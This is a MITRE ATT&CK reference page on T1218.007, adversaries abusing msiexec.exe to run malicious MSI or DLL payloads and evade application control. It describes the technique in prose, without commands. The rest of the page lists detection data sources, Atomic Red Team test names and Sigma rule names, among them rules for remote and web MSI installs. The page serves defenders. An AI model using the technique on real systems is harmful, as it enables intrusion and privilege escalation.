T1218.007: Msiexec
| View on MITRE ATT&CK | T1218.007 |
|---|---|
| Tactic(s) | Defense Evasion |
Data from MITRE ATT&CK®:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
© 2024 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
Cyber Threat Graph Context
Explore how this ATT&CK Technique relates to the wider threat graph
Reporting on this Technique
Connect:fun Detailing an exploitation campaign targeting FortiClient EMS via CVE-2023-48788
This report from Vedere Labs at Forescout Research details an exploitation campaign which they have designated Connect:fun. The attacks exploit ...
Mitigations for this technique
MITRE ATT&CK Mitigations
How to detect this technique
MITRE ATT&CK Data Components
Module Load (Module)
Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)Process Creation (Process)
The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)Network Connection Creation (Network Traffic)
Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)Command Execution (Command)
The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )Control Validation Tests for this Technique
Use Atomic Red Team tests to test your defenses against this technique.
WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
Msiexec.exe - Execute Local MSI file with an embedded DLL
WMI Win32_Product Class - Execute Local MSI file with embedded JScript
WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
Msiexec.exe - Execute the DllUnregisterServer function of a DLL
Msiexec.exe - Execute Local MSI file with embedded VBScript
Msiexec.exe - Execute Local MSI file with embedded JScript
Msiexec.exe - Execute Local MSI file with an embedded EXE
Msiexec.exe - Execute the DllRegisterServer function of a DLL
Msiexec.exe - Execute Remote MSI file
WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
Sigma Detections for this Technique
Msiexec Quiet Installation
Suspicious Msiexec Execute Arbitrary DLL
PowerShell WMI Win32_Product Install MSI
Suspicious MsiExec Embedding Parent
MsiExec Web Install
DllUnregisterServer Function Call Via Msiexec.EXE
Suspicious Msiexec Quiet Install From Remote Location
MSI Installation From Web
Msiexec.EXE Initiated Network Connection Over HTTP
SP800-53 Controls
See which controls can help protect against this MITRE ATT&CK technique. This is based on mappings to associated SP800-53 controls produced by the MITRE Engenuity Center for Threat-Informed Defense.